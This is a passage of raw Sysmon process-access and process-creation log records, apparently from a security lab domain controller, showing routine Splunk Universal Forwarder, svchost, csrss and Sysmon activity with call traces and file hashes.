AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.531{08A6967A-4327-6000-CE00-000000009A01}46604664C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.296{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4327-6000-CE00-000000009A01}4660C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.296{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4327-6000-CE00-000000009A01}4660C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4327-6000-CD00-000000009A01}46484652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4327-6000-CE00-000000009A01}4660C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.294{08A6967A-4327-6000-CE00-000000009A01}4660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4327-6000-CD00-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000003854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4327-6000-CD00-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4327-6000-CD00-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.280{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4327-6000-CD00-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.287{08A6967A-4327-6000-CD00-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4326-6000-CA00-000000009A01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.249{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4327-6000-CC00-000000009A01}3408C:\Program 